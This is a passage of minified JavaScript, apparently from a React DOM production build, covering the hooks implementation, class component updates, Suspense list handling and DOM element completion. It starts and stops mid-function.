t=null===ni?ei.memoizedState:ni.next;if(null!==t)ni=t,ti=e;else{if(null===e)throw Error(i(310));e={memoizedState:(ti=e).memoizedState,baseState:ti.baseState,baseQueue:ti.baseQueue,queue:ti.queue,next:null},null===ni?ei.memoizedState=ni=e:ni=ni.next=e}return ni}function ci(e,t){return"function"==typeof t?t(e):t}function di(e){var t=pi(),n=t.queue;if(null===n)throw Error(i(311));n.lastRenderedReducer=e;var a=ti,r=a.baseQueue,o=n.pending;if(null!==o){if(null!==r){var l=r.next;r.next=o.next,o.next=l}a.baseQueue=r=o,n.pending=null}if(null!==r){r=r.next,a=a.baseState;var s=l=o=null,p=r;do{var c=p.lane;if((Yo&c)===c)null!==s&&(s=s.next={lane:0,action:p.action,eagerReducer:p.eagerReducer,eagerState:p.eagerState,next:null}),a=p.eagerReducer===e?p.eagerState:e(a,p.action);else{var d={lane:c,action:p.action,eagerReducer:p.eagerReducer,eagerState:p.eagerState,next:null};null===s?(l=s=d,o=a):s=s.next=d,ei.lanes|=c,Vl|=c}p=p.next}while(null!==p&&p!==r);null===s?o=a:s.next=l,ca(a,t.memoizedState)||(Ri=!0),t.memoizedState=a,t.baseState=o,t.baseQueue=s,n.lastRenderedState=a}return[t.memoizedState,n.dispatch]}function ui(e){var t=pi(),n=t.queue;if(null===n)throw Error(i(311));n.lastRenderedReducer=e;var a=n.dispatch,r=n.pending,o=t.memoizedState;if(null!==r){n.pending=null;var l=r=r.next;do{o=e(o,l.action),l=l.next}while(l!==r);ca(o,t.memoizedState)||(Ri=!0),t.memoizedState=o,null===t.baseQueue&&(t.baseState=o),n.lastRenderedState=o}return[o,a]}function mi(e,t,n){var a=t._getVersion;a=a(t._source);var r=t._workInProgressVersionPrimary;if(null!==r?e=r===a:(e=e.mutableReadLanes,(e=(Yo&e)===e)&&(t._workInProgressVersionPrimary=a,Ko.push(t))),e)return n(t._source);throw Ko.push(t),Error(i(350))}function fi(e,t,n,a){var r=zl;if(null===r)throw Error(i(349));var o=t._getVersion,l=o(t._source),s=Qo.current,p=s.useState((function(){return mi(r,t,n)})),c=p[1],d=p[0];p=ni;var u=e.memoizedState,m=u.refs,f=m.getSnapshot,h=u.source;u=u.subscribe;var g=ei;return e.memoizedState={refs:m,source:t,subscribe:a},s.useEffect((function(){m.getSnapshot=n,m.setSnapshot=c;var e=o(t._source);if(!ca(l,e)){e=n(t._source),ca(d,e)||(c(e),e=us(g),r.mutableReadLanes|=e&r.pendingLanes),e=r.mutableReadLanes,r.entangledLanes|=e;for(var a=r.entanglements,i=e;0<i;){var s=31-Dt(i),p=1<<s;a[s]|=e,i&=~p}}}),[n,t,a]),s.useEffect((function(){return a(t._source,(function(){var e=m.getSnapshot,n=m.setSnapshot;try{n(e(t._source));var a=us(g);r.mutableReadLanes|=a&r.pendingLanes}catch(e){n((function(){throw e}))}}))}),[t,a]),ca(f,n)&&ca(h,t)&&ca(u,a)||((e={pending:null,dispatch:null,lastRenderedReducer:ci,lastRenderedState:d}).dispatch=c=Pi.bind(null,ei,e),p.queue=e,p.baseQueue=null,d=mi(r,t,n),p.memoizedState=p.baseState=d),d}function hi(e,t,n){return fi(pi(),e,t,n)}function gi(e){var t=si();return"function"==typeof e&&(e=e()),t.memoizedState=t.baseState=e,e=(e=t.queue={pending:null,dispatch:null,lastRenderedReducer:ci,lastRenderedState:e}).dispatch=Pi.bind(null,ei,e),[t.memoizedState,e]}function vi(e,t,n,a){return e={tag:e,create:t,destroy:n,deps:a,next:null},null===(t=ei.updateQueue)?(t={lastEffect:null},ei.updateQueue=t,t.lastEffect=e.next=e):null===(n=t.lastEffect)?t.lastEffect=e.next=e:(a=n.next,n.next=e,e.next=a,t.lastEffect=e),e}function _i(e){return e={current:e},si().memoizedState=e}function wi(){return pi().memoizedState}function bi(e,t,n,a){var r=si();ei.flags|=e,r.memoizedState=vi(1|t,n,void 0,void 0===a?null:a)}function xi(e,t,n,a){var r=pi();a=void 0===a?null:a;var o=void 0;if(null!==ti){var i=ti.memoizedState;if(o=i.destroy,null!==a&&ii(a,i.deps))return void vi(t,n,o,a)}ei.flags|=e,r.memoizedState=vi(1|t,n,o,a)}function yi(e,t){return bi(516,4,e,t)}function ki(e,t){return xi(516,4,e,t)}function Ei(e,t){return xi(4,2,e,t)}function Ci(e,t){return"function"==typeof t?(e=e(),t(e),function(){t(null)}):null!=t?(e=e(),t.current=e,function(){t.current=null}):void 0}function Si(e,t,n){return n=null!=n?n.concat([e]):null,xi(4,2,Ci.bind(null,t,e),n)}function Mi(){}function Li(e,t){var n=pi();t=void 0===t?null:t;var a=n.memoizedState;return null!==a&&null!==t&&ii(t,a[1])?a[0]:(n.memoizedState=[e,t],e)}function Ni(e,t){var n=pi();t=void 0===t?null:t;var a=n.memoizedState;return null!==a&&null!==t&&ii(t,a[1])?a[0]:(e=e(),n.memoizedState=[e,t],e)}function Zi(e,t){var n=Ir();$r(98>n?98:n,(function(){e(!0)})),$r(97<n?97:n,(function(){var n=Jo.transition;Jo.transition=1;try{e(!1),t()}finally{Jo.transition=n}}))}function Pi(e,t,n){var a=ds(),r=us(e),o={lane:r,action:n,eagerReducer:null,eagerState:null,next:null},i=t.pending;if(null===i?o.next=o:(o.next=i.next,i.next=o),t.pending=o,i=e.alternate,e===ei||null!==i&&i===ei)ri=ai=!0;else{if(0===e.lanes&&(null===i||0===i.lanes)&&null!==(i=t.lastRenderedReducer))try{var l=t.lastRenderedState,s=i(l,n);if(o.eagerReducer=i,o.eagerState=s,ca(s,l))return}catch(e){}ms(e,r,a)}}var zi={readContext:io,useCallback:oi,useContext:oi,useEffect:oi,useImperativeHandle:oi,useLayoutEffect:oi,useMemo:oi,useReducer:oi,useRef:oi,useState:oi,useDebugValue:oi,useDeferredValue:oi,useTransition:oi,useMutableSource:oi,useOpaqueIdentifier:oi,unstable_isNewReconciler:!1},Ai={readContext:io,useCallback:function(e,t){return si().memoizedState=[e,void 0===t?null:t],e},useContext:io,useEffect:yi,useImperativeHandle:function(e,t,n){return n=null!=n?n.concat([e]):null,bi(4,2,Ci.bind(null,t,e),n)},useLayoutEffect:function(e,t){return bi(4,2,e,t)},useMemo:function(e,t){var n=si();return t=void 0===t?null:t,e=e(),n.memoizedState=[e,t],e},useReducer:function(e,t,n){var a=si();return t=void 0!==n?n(t):t,a.memoizedState=a.baseState=t,e=(e=a.queue={pending:null,dispatch:null,lastRenderedReducer:e,lastRenderedState:t}).dispatch=Pi.bind(null,ei,e),[a.memoizedState,e]},useRef:_i,useState:gi,useDebugValue:Mi,useDeferredValue:function(e){var t=gi(e),n=t[0],a=t[1];return yi((function(){var t=Jo.transition;Jo.transition=1;try{a(e)}finally{Jo.transition=t}}),[e]),n},useTransition:function(){var e=gi(!1),t=e[0];return _i(e=Zi.bind(null,e[1])),[e,t]},useMutableSource:function(e,t,n){var a=si();return a.memoizedState={refs:{getSnapshot:t,setSnapshot:null},source:e,subscribe:n},fi(a,e,t,n)},useOpaqueIdentifier:function(){if(Wo){var e=!1,t=function(e){return{$$typeof:H,toString:e,valueOf:e}}((function(){throw e||(e=!0,n("r:"+(Xa++).toString(36))),Error(i(355))})),n=gi(t)[1];return 0==(2&ei.mode)&&(ei.flags|=516,vi(5,(function(){n("r:"+(Xa++).toString(36))}),void 0,null)),t}return gi(t="r:"+(Xa++).toString(36)),t},unstable_isNewReconciler:!1},Bi={readContext:io,useCallback:Li,useContext:io,useEffect:ki,useImperativeHandle:Si,useLayoutEffect:Ei,useMemo:Ni,useReducer:di,useRef:wi,useState:function(){return di(ci)},useDebugValue:Mi,useDeferredValue:function(e){var t=di(ci),n=t[0],a=t[1];return ki((function(){var t=Jo.transition;Jo.transition=1;try{a(e)}finally{Jo.transition=t}}),[e]),n},useTransition:function(){var e=di(ci)[0];return[wi().current,e]},useMutableSource:hi,useOpaqueIdentifier:function(){return di(ci)[0]},unstable_isNewReconciler:!1},Hi={readContext:io,useCallback:Li,useContext:io,useEffect:ki,useImperativeHandle:Si,useLayoutEffect:Ei,useMemo:Ni,useReducer:ui,useRef:wi,useState:function(){return ui(ci)},useDebugValue:Mi,useDeferredValue:function(e){var t=ui(ci),n=t[0],a=t[1];return ki((function(){var t=Jo.transition;Jo.transition=1;try{a(e)}finally{Jo.transition=t}}),[e]),n},useTransition:function(){var e=ui(ci)[0];return[wi().current,e]},useMutableSource:hi,useOpaqueIdentifier:function(){return ui(ci)[0]},unstable_isNewReconciler:!1},Ti=x.ReactCurrentOwner,Ri=!1;function Oi(e,t,n,a){t.child=null===e?Lo(t,null,n,a):Mo(t,e.child,n,a)}function ji(e,t,n,a,r){n=n.render;var o=t.ref;return oo(t,r),a=li(e,t,n,a,o,r),null===e||Ri?(t.flags|=1,Oi(e,t,a,r),t.child):(t.updateQueue=e.updateQueue,t.flags&=-517,e.lanes&=~r,rl(e,t,r))}function Vi(e,t,n,a,r,o){if(null===e){var i=n.type;return"function"!=typeof i||Is(i)||void 0!==i.defaultProps||null!==n.compare||void 0!==n.defaultProps?((e=$s(n.type,null,a,t,t.mode,o)).ref=t.ref,e.return=t,t.child=e):(t.tag=15,t.type=i,Fi(e,t,i,a,r,o))}return i=e.child,0==(r&o)&&(r=i.memoizedProps,(n=null!==(n=n.compare)?n:ua)(r,a)&&e.ref===t.ref)?rl(e,t,o):(t.flags|=1,(e=Us(i,a)).ref=t.ref,e.return=t,t.child=e)}function Fi(e,t,n,a,r,o){if(null!==e&&ua(e.memoizedProps,a)&&e.ref===t.ref){if(Ri=!1,0==(o&r))return t.lanes=e.lanes,rl(e,t,o);0!=(16384&e.flags)&&(Ri=!0)}return Ii(e,t,n,a,o)}function Wi(e,t,n){var a=t.pendingProps,r=a.children,o=null!==e?e.memoizedState:null;if("hidden"===a.mode||"unstable-defer-without-hiding"===a.mode)if(0==(4&t.mode))t.memoizedState={baseLanes:0},xs(0,n);else{if(0==(1073741824&n))return e=null!==o?o.baseLanes|n:n,t.lanes=t.childLanes=1073741824,t.memoizedState={baseLanes:e},xs(0,e),null;t.memoizedState={baseLanes:0},xs(0,null!==o?o.baseLanes:n)}else null!==o?(a=o.baseLanes|n,t.memoizedState=null):a=n,xs(0,a);return Oi(e,t,r,n),t.child}function Di(e,t){var n=t.ref;(null===e&&null!==n||null!==e&&e.ref!==n)&&(t.flags|=128)}function Ii(e,t,n,a,r){var o=vr(n)?hr:mr.current;return o=gr(t,o),oo(t,r),n=li(e,t,n,a,o,r),null===e||Ri?(t.flags|=1,Oi(e,t,n,r),t.child):(t.updateQueue=e.updateQueue,t.flags&=-517,e.lanes&=~r,rl(e,t,r))}function Ui(e,t,n,a,r){if(vr(n)){var o=!0;xr(t)}else o=!1;if(oo(t,r),null===t.stateNode)null!==e&&(e.alternate=null,t.alternate=null,t.flags|=2),bo(t,n,a),yo(t,n,a,r),a=!0;else if(null===e){var i=t.stateNode,l=t.memoizedProps;i.props=l;var s=i.context,p=n.contextType;p="object"==typeof p&&null!==p?io(p):gr(t,p=vr(n)?hr:mr.current);var c=n.getDerivedStateFromProps,d="function"==typeof c||"function"==typeof i.getSnapshotBeforeUpdate;d||"function"!=typeof i.UNSAFE_componentWillReceiveProps&&"function"!=typeof i.componentWillReceiveProps||(l!==a||s!==p)&&xo(t,i,a,p),lo=!1;var u=t.memoizedState;i.state=u,fo(t,a,i,r),s=t.memoizedState,l!==a||u!==s||fr.current||lo?("function"==typeof c&&(vo(t,n,c,a),s=t.memoizedState),(l=lo||wo(t,n,l,a,u,s,p))?(d||"function"!=typeof i.UNSAFE_componentWillMount&&"function"!=typeof i.componentWillMount||("function"==typeof i.componentWillMount&&i.componentWillMount(),"function"==typeof i.UNSAFE_componentWillMount&&i.UNSAFE_componentWillMount()),"function"==typeof i.componentDidMount&&(t.flags|=4)):("function"==typeof i.componentDidMount&&(t.flags|=4),t.memoizedProps=a,t.memoizedState=s),i.props=a,i.state=s,i.context=p,a=l):("function"==typeof i.componentDidMount&&(t.flags|=4),a=!1)}else{i=t.stateNode,po(e,t),l=t.memoizedProps,p=t.type===t.elementType?l:Qr(t.type,l),i.props=p,d=t.pendingProps,u=i.context,s="object"==typeof(s=n.contextType)&&null!==s?io(s):gr(t,s=vr(n)?hr:mr.current);var m=n.getDerivedStateFromProps;(c="function"==typeof m||"function"==typeof i.getSnapshotBeforeUpdate)||"function"!=typeof i.UNSAFE_componentWillReceiveProps&&"function"!=typeof i.componentWillReceiveProps||(l!==d||u!==s)&&xo(t,i,a,s),lo=!1,u=t.memoizedState,i.state=u,fo(t,a,i,r);var f=t.memoizedState;l!==d||u!==f||fr.current||lo?("function"==typeof m&&(vo(t,n,m,a),f=t.memoizedState),(p=lo||wo(t,n,p,a,u,f,s))?(c||"function"!=typeof i.UNSAFE_componentWillUpdate&&"function"!=typeof i.componentWillUpdate||("function"==typeof i.componentWillUpdate&&i.componentWillUpdate(a,f,s),"function"==typeof i.UNSAFE_componentWillUpdate&&i.UNSAFE_componentWillUpdate(a,f,s)),"function"==typeof i.componentDidUpdate&&(t.flags|=4),"function"==typeof i.getSnapshotBeforeUpdate&&(t.flags|=256)):("function"!=typeof i.componentDidUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=4),"function"!=typeof i.getSnapshotBeforeUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=256),t.memoizedProps=a,t.memoizedState=f),i.props=a,i.state=f,i.context=s,a=p):("function"!=typeof i.componentDidUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=4),"function"!=typeof i.getSnapshotBeforeUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=256),a=!1)}return $i(e,t,n,a,o,r)}function $i(e,t,n,a,r,o){Di(e,t);var i=0!=(64&t.flags);if(!a&&!i)return r&&yr(t,n,!1),rl(e,t,o);a=t.stateNode,Ti.current=t;var l=i&&"function"!=typeof n.getDerivedStateFromError?null:a.render();return t.flags|=1,null!==e&&i?(t.child=Mo(t,e.child,null,o),t.child=Mo(t,null,l,o)):Oi(e,t,l,o),t.memoizedState=a.state,r&&yr(t,n,!0),t.child}function Gi(e){var t=e.stateNode;t.pendingContext?wr(0,t.pendingContext,t.pendingContext!==t.context):t.context&&wr(0,t.context,!1),Bo(e,t.containerInfo)}var qi,Ki,Xi,Qi,Ji={dehydrated:null,retryLane:0};function Yi(e,t,n){var a,r=t.pendingProps,o=Oo.current,i=!1;return(a=0!=(64&t.flags))||(a=(null===e||null!==e.memoizedState)&&0!=(2&o)),a?(i=!0,t.flags&=-65):null!==e&&null===e.memoizedState||void 0===r.fallback||!0===r.unstable_avoidThisFallback||(o|=1),dr(Oo,1&o),null===e?(void 0!==r.fallback&&Uo(t),e=r.children,o=r.fallback,i?(e=el(t,e,o,n),t.child.memoizedState={baseLanes:n},t.memoizedState=Ji,e):"number"==typeof r.unstable_expectedLoadTime?(e=el(t,e,o,n),t.child.memoizedState={baseLanes:n},t.memoizedState=Ji,t.lanes=33554432,e):((n=qs({mode:"visible",children:e},t.mode,n,null)).return=t,t.child=n)):(e.memoizedState,i?(r=function(e,t,n,a,r){var o=t.mode,i=e.child;e=i.sibling;var l={mode:"hidden",children:n};return 0==(2&o)&&t.child!==i?((n=t.child).childLanes=0,n.pendingProps=l,null!==(i=n.lastEffect)?(t.firstEffect=n.firstEffect,t.lastEffect=i,i.nextEffect=null):t.firstEffect=t.lastEffect=null):n=Us(i,l),null!==e?a=Us(e,a):(a=Gs(a,o,r,null)).flags|=2,a.return=t,n.return=t,n.sibling=a,t.child=n,a}(e,t,r.children,r.fallback,n),i=t.child,o=e.child.memoizedState,i.memoizedState=null===o?{baseLanes:n}:{baseLanes:o.baseLanes|n},i.childLanes=e.childLanes&~n,t.memoizedState=Ji,r):(n=function(e,t,n,a){var r=e.child;return e=r.sibling,n=Us(r,{mode:"visible",children:n}),0==(2&t.mode)&&(n.lanes=a),n.return=t,n.sibling=null,null!==e&&(e.nextEffect=null,e.flags=8,t.firstEffect=t.lastEffect=e),t.child=n}(e,t,r.children,n),t.memoizedState=null,n))}function el(e,t,n,a){var r=e.mode,o=e.child;return t={mode:"hidden",children:t},0==(2&r)&&null!==o?(o.childLanes=0,o.pendingProps=t):o=qs(t,r,0,null),n=Gs(n,r,a,null),o.return=e,n.return=e,o.sibling=n,e.child=o,n}function tl(e,t){e.lanes|=t;var n=e.alternate;null!==n&&(n.lanes|=t),ro(e.return,t)}function nl(e,t,n,a,r,o){var i=e.memoizedState;null===i?e.memoizedState={isBackwards:t,rendering:null,renderingStartTime:0,last:a,tail:n,tailMode:r,lastEffect:o}:(i.isBackwards=t,i.rendering=null,i.renderingStartTime=0,i.last=a,i.tail=n,i.tailMode=r,i.lastEffect=o)}function al(e,t,n){var a=t.pendingProps,r=a.revealOrder,o=a.tail;if(Oi(e,t,a.children,n),0!=(2&(a=Oo.current)))a=1&a|2,t.flags|=64;else{if(null!==e&&0!=(64&e.flags))e:for(e=t.child;null!==e;){if(13===e.tag)null!==e.memoizedState&&tl(e,n);else if(19===e.tag)tl(e,n);else if(null!==e.child){e.child.return=e,e=e.child;continue}if(e===t)break e;for(;null===e.sibling;){if(null===e.return||e.return===t)break e;e=e.return}e.sibling.return=e.return,e=e.sibling}a&=1}if(dr(Oo,a),0==(2&t.mode))t.memoizedState=null;else switch(r){case"forwards":for(n=t.child,r=null;null!==n;)null!==(e=n.alternate)&&null===jo(e)&&(r=n),n=n.sibling;null===(n=r)?(r=t.child,t.child=null):(r=n.sibling,n.sibling=null),nl(t,!1,r,n,o,t.lastEffect);break;case"backwards":for(n=null,r=t.child,t.child=null;null!==r;){if(null!==(e=r.alternate)&&null===jo(e)){t.child=r;break}e=r.sibling,r.sibling=n,n=r,r=e}nl(t,!0,n,null,o,t.lastEffect);break;case"together":nl(t,!1,null,null,void 0,t.lastEffect);break;default:t.memoizedState=null}return t.child}function rl(e,t,n){if(null!==e&&(t.dependencies=e.dependencies),Vl|=t.lanes,0!=(n&t.childLanes)){if(null!==e&&t.child!==e.child)throw Error(i(153));if(null!==t.child){for(n=Us(e=t.child,e.pendingProps),t.child=n,n.return=t;null!==e.sibling;)e=e.sibling,(n=n.sibling=Us(e,e.pendingProps)).return=t;n.sibling=null}return t.child}return null}function ol(e,t){if(!Wo)switch(e.tailMode){case"hidden":t=e.tail;for(var n=null;null!==t;)null!==t.alternate&&(n=t),t=t.sibling;null===n?e.tail=null:n.sibling=null;break;case"collapsed":n=e.tail;for(var a=null;null!==n;)null!==n.alternate&&(a=n),n=n.sibling;null===a?t||null===e.tail?e.tail=null:e.tail.sibling=null:a.sibling=null}}function il(e,t,n){var a=t.pendingProps;switch(t.tag){case 2:case 16:case 15:case 0:case 11:case 7:case 8:case 12:case 9:case 14:return null;case 1:case 17:return vr(t.type)&&_r(),null;case 3:return Ho(),cr(fr),cr(mr),Xo(),(a=t.stateNode).pendingContext&&(a.context=a.pendingContext,a.pendingContext=null),null!==e&&null!==e.child||(Go(t)?t.flags|=4:a.hydrate||(t.flags|=256)),Ki(t),null;case 5:Ro(t);var o=Ao(zo.current);if(n=t.type,null!==e&&null!=t.stateNode)Xi(e,t,n,a,o),e.ref!==t.ref&&(t.flags|=128);else{if(!a){if(null===t.stateNode)throw Error(i(166));return null}if(e=Ao(Zo.current),Go(t)){a=t.stateNode,n=t.type;var l=t.memoizedProps;switch(a[Ja]=t,a[Ya]=l,n){case"dialog":Za("cancel",a),Za("close",a);break;case"iframe":case"object":case"embed":Za("load",a);break;case"video":case"audio":for(e=0;e<Sa.length;e++)Za(Sa[e],a);break;case"source":Za("error",a);break;case"img":case"image":case"link":Za("error",a),Za("load",a);break;case"details":Za("toggle",a);break;case"input":ee(a,l),Za("invalid",a);break;case"select":a._wrapperState={wasMultiple:!!l.multiple},Za("invalid",a);break;case"textarea":se(a,l),Za("invalid",a)}for(var p in ke(n,l),e=null,l)l.hasOwnProperty(p)&&(o=l[p],"children"===p?"string"==typeof o?a.textContent!==o&&(e=["children",o]):"number"==typeof o&&a.textContent!==""+o&&(e=["children",""+o]):s.hasOwnProperty(p)&&null!=o&&"onScroll"===p&&Za("scroll",a));switch(n){case"input":X(a),ae(a,l,!0);break;case"textarea":X(a),ce(a);break;case"select":case"option":break;default:"function"==typeof l.onClick&&(a.onclick=Va)}a=e,t.updateQueue=a,null!==a&&(t.flags|=4)}else{switch(p=9===o.nodeType?o:o.ownerDocument,e===de.html&&(e=ue(n)),e===de.html?"script"===n?((e=p.createElement("div")).innerHTML="<script><\/script>",e=e.removeChild(e.firstChild)):"string"==typeof a.is?e=p.createElement(n,{is:a.is}):(e=p.createElement(n),"select"===n&&(p=e,a.multiple?p.multiple=!0:a.size&&(p.size=a.size))):e=p.createElementNS(e,n),e[Ja]=t,e[Ya]=a,qi(e,t,!1,!1),t.stateNode=e,p=Ee(n,a),n){case"dialog":Za("cancel",e),Za("close",e),o=a;break;case"iframe":case"object":case"embed":Za("load",e),o=a;break;case"video":case"audio":for(o=0;o<Sa.length;o++)Za(Sa[o],e);o=a;break;case"source":Za("error",e),o=a;break;case"img":case"image":case"link":Za("error",e),Za("load",e),o=a;break;case"details":Za("toggle",e),o=a;break;case"input":ee(e,a),o=Y(e,a),Za("invalid",e);break;case"option":o=oe(e,a);break;case"select":e._wrapperState={wasMultiple:!!a.multiple},o=r({},a,{value:void 0}),Za("invalid",e);break;case"textarea":se(e,a),o=le(e,a),Za("invalid",e);break;default:o=a}ke(n,o);var c=o;for(l in c)if(c.hasOwnProperty(l)){var d=c[l];"style"===l?xe(e,d):"dangerouslySetInnerHTML"===l?null!=(d=d?d.__html:void 0)&&ge(e,d):"children"===l?"string"==typeof d?("textarea"!==n||""!==d)&&ve(e,d):"number"==typeof d&&ve(e,""+d):"suppressContentEditableWarning"!==l&&"suppressHydrationWarning"!==l&&"autoFocus"!==l&&(s.hasOwnProperty(l)?null!=d&&"onScroll"===l&&Za("scroll",e):null!=d&&b(e,l,d,p))}switch(n){case"input":X(e),ae(e,a,!1);break;case"textarea":X(e),ce(e);break;case"option":null!=a.value&&e.setAttribute("value",""+q(a.value));break;case"select":e.multiple=!!a.multiple,null!=(l=a.value)?ie(e,!!a.multiple,l,!1):null!=a.defaultValue&&ie(e,!!a.multiple,a.defaultValue,!0);break;default:"function"==typeof o.onClick&&(e.onclick=Va)}Da(n,a)&&(t.flags|=4)}null!==t.ref&&(t.flags|=128)}return null;case 6:if(e&&null!=t.stateNode)Qi(e,t,e.memoizedProps,a);else{if("string"!=typeof a&&null===t.stateNode)throw Error(i(166));n=Ao(zo.current),Ao(Zo.current),Go(t)?(a=t.stateNode,n=t.memoizedProps,a[Ja]=t,a.nodeValue!==n&&(t.flags|=4)):((a=(9===n.nodeType?n:n.ownerDocument).createTextNode(a))[Ja]=t,t.stateNode=a)}return null;case 13:return cr(Oo),a=t.memoizedState,0!=(64&t.flags)?(t.lanes=n,t):(a=null!==a,n=!1,null===e?void 0!==t.memoizedProps.fallback&&Go(t):n=null!==e.memoizedState,a&&!n&&0!=(2&t.mode)&&(null===e&&!0!==t.memoizedProps.unstable_avoidThisFallback||0!=(1&Oo.current)?0===Rl&&(Rl=3):(0!==Rl&&3!==Rl||(Rl=4),null===zl||0==(134217727&Vl)&&0==(134217727&Fl)||vs(zl,Bl))),(a||n)&&(t.flags|=4),null);case 4:return Ho(),Ki(t),null===e&&za(t.stateNode.containerInfo),null;case 10:return ao(t),null;case 19:if(cr(Oo),null===(a=t.memoizedState))return null;if(l=0!=(64&t.flags),null===(p=a.rendering))if(l)ol(a,!1);else{if(0!==Rl||null!==e&&0!=(64&e.flags))for(e=t.child;null!==e;){if(null!==(p=jo(e))){for(t.flags|=64,ol(a,!1),null!==(l=p.updateQueue)&&(t.updateQueue=l,t.flags|=4),null===a.lastEffect&&(t.firstEffect=null),t.lastEffect=a.lastEffect,a=n,n=t.child;null!==n;)e=a,(l=n).flags&=2,l.nextEffect=null,l.firstEffect=null,l.lastEffect=null,null===(p=l.alternate)?(l.childLanes=0,l.lanes=e,l.child=null,l.memoizedProps=null,l.memoizedState=null,l.updateQueue=null,l.dependencies=null,l.stateNode=null):(l.childLanes=p.childLanes,l.lanes=p.lanes,l.child=p.child,l.memoizedProps=p.memoizedProps,l.memoizedState=p.memoizedState,l.updateQueue=p.updateQueue,l.type=p.type,e=p.dependencies,l.dependencies=null===e?null:{lanes:e.lanes,firstContext:e.firstContext}),n=n.sibling;return dr(Oo,1&Oo.current|2),t.child}e=e.sibling}null!==a.tail&&Dr()>Ul&&(t.flags|=64,l=!0,ol(a,!1),t.lanes=33554432)}else{if(!l)if(null!==(e=jo(p))){if(t.flags|=64,l=!0,null!==(n=e.updateQueue)&&(t.updateQueue=n,t.flags|=4),ol(a,!0),null===a.tail&&"hidden"===a.tailMode&&!p.alternate&&!Wo)return null!==(t=t.lastEffect=a.lastEffect)&&(t.nextEffect=null),null}else 2*Dr()-a.renderingStartTime>Ul&&1073741824!==n&&(t.flags|=64,l=!0,ol(a,!1),t.lanes=33554432);a.isBackwards?(p.sibling=t.child,t.child=p):(null!==(n=a.last)?n.sibling=p:t.child=p,a.last=p)}return null!==a.tail?(n=a.tail,a.rendering=n,a.tail=n.sibling,a.lastEffect=t.lastEffect,a.renderingStartTime=Dr(),n.sibling=null,t=Oo.current,dr(Oo,l?1&t|2:1&t),n):null;case 23:case 24:return ys(),null!==e&&null!==e.memoizedState!=(null!==t.memoizedState)&&"unstable-defer-without-hiding"!==a.mode&&(t.flags|=4),null}throw Error(i(156,t.tag))}function ll(e){switch(e.tag){case 1:vr(e.type)&&_r();var t=e.flags;return 4096&t?(e.flags=-4097&t|64,e):null;case 3:if(Ho(),cr(fr),cr(mr),Xo(),0!=(64&(t=e.flags)))throw Error(i(285));return e.flags=-4097&t|64,e;case 5:return Ro(e),null;case 13:return cr(Oo),4096&(t=e.flags)?(e.flags=-4097&t|64,e):null;case 19:return cr(Oo),null;case 4:return Ho(),null;case 10:return ao(e),null;case 23:case 24:return ys(),null;default:return null}}function sl(e,t){try{var n="",a=t;do{n+=$(a),a=a.return}while(a);var r=n}catch(e){r="\nError generating stack: "+e.message+"\n"+e.stack}return{value:e,source:t,stack:r}}function pl(e,t){try{console.error(t.value)}catch(e){setTimeout((function(){throw e}))}}qi=function(e,t){for(var n=t.child;null!==n;){if(5===n.tag||6===n.tag)e.appendChild(n.stateNode);else if(4!==n.tag&&null!==n.child){n.child.return=n,n=n.child;continue}if(n===t)break;for(;null===n.sibling;){if(null===n.return||n.return===t)return;n=n.return}n.sibling.return=n.return,n=n.sibling}},Ki=function(){},Xi=function(e,t,n,a){var o=e.memoizedProps;if(o!==a){e=t.stateNode,Ao(Zo.current);var i,l=null;switch(n){case"input":o=Y(e,o),a=Y(e,a),l=[];break;case"option":o=oe(e,o),a=oe(e,a),l=[];break;case"select":o=r({},o,{value:void 0}),a=r({},a,{value:void 0}),l=[];break;case"textarea":o=le(e,o),a=le(e,a),l=[];break;default:"function"!=typeof o.onClick&&"function"==typeof a.onClick&&(e.onclick=Va)}for(d in ke(n,a),n=null,o)if(!a.hasOwnProperty(d)&&o.hasOwnProperty(d)&&null!=o[d])if("style"===d){var p=o[d];for(i in p)p.hasOwnProperty(i)&&(n||(n={}),n[i]="")}else"dangerouslySetInnerHTML"!==d&&"children"!==d&&"suppressContentEditableWarning"!==d&&"suppressHydrationWarning"!==d&&"autoFocus"!==d&&(s.hasOwnProperty(d)?l||(l=[]):(l=l||[]).push(d,null));for(d in a){var c=a[d];if(p=null!=o?o[d]:void 0,a.hasOwnProperty(d)&&c!==p&&(null!=c||null!=p))if("style"===d)if(p){for(i in p)!p.hasOwnProperty(i)||c&&c.hasOwnProperty(i)||(n||(n={}),n[i]="");for(i in c)c.hasOwnProperty(i)&&p[i]!==c[i]&&(n||(n={}),n[i]=c[i])}else n||(l||(l=[]),l.push(d,n)),n=c;else"dangerouslySetInnerHTML"===d?(c=c?c.__html:void 0,p=p?p.__html:void 0,null!=c&&p!==c&&(l=l||[]).push(d,c)):"children"===d?"string"!=typeof c&&"number"!=typeof c||(l=l||[]).push(d,""+c):"suppressContentEditableWarning"!==d&&"suppressHydrationWarning"!==d&&(s.hasOwnProperty(d)?(null!=c&&"onScroll"===d&&Za("scroll",e),l||p===c||(l=[])):"object"==typeof c&&null!==c&&c.$$typeof===H?c.toString():(l=l||[]).push(d,c))}n&&(l=l||[]).push("style",n);var d=l;(t.updateQueue=d)&&(t.flags|=4)}},Qi=function(e,t,n,a){n!==a&&(t.flags|=4)};var cl="function"==typeof WeakMap?WeakMap:Map;function dl(e,t,n){(n=co(-1,n)).tag=3,n.payload={element:null};var a=t.value;return n.callback=function(){Kl||(Kl=!0,Xl=a),pl(0,t)},n}function ul(e,t,n){(n=co(-1,n)).tag=3;var a=e.type.getDerivedStateFromError;if("function"==typeof a){var r=t.value;n.payload=function(){return pl(0,t),a(r)}}var o=e.stateNode;return null!==o&&"function"==typeof o.componentDidCatch&&(n.callback=function(){"function"!=typeof a&&(null===Ql?Ql=new Set([this]):Ql.add(this),pl(0,t));var e=t.stack;this.componentDidCatch(t.value,{componentStack:null!==e?e:""})}),n}var ml="function"==typeof WeakSet?WeakSet:Set;function fl(e){var t=e.ref;if(null!==t)if("function"==typeof t)try{t(null)}catch(t){js(e,t)}else t.current=null}function hl(e,t){switch(t.tag){case 0:case 11:case 15:case 22:case 5:case 6:case 4:case 17:return;case 1:if(256&t.flags&&null!==e){var n=e.memoizedProps,a=e.memoizedState;t=(e=t.stateNode).getSnapshotBeforeUpdate(t.elementType===t.type?n:Qr(t.type,n),a),e.__reactInternalSnapshotBeforeUpdate=t}return;case 3:return void(256&t.flags&&Ga(t.stateNode.containerInfo))}throw Error(i(163))}function gl(e,t,n){switch(n.tag){case 0:case 11:case 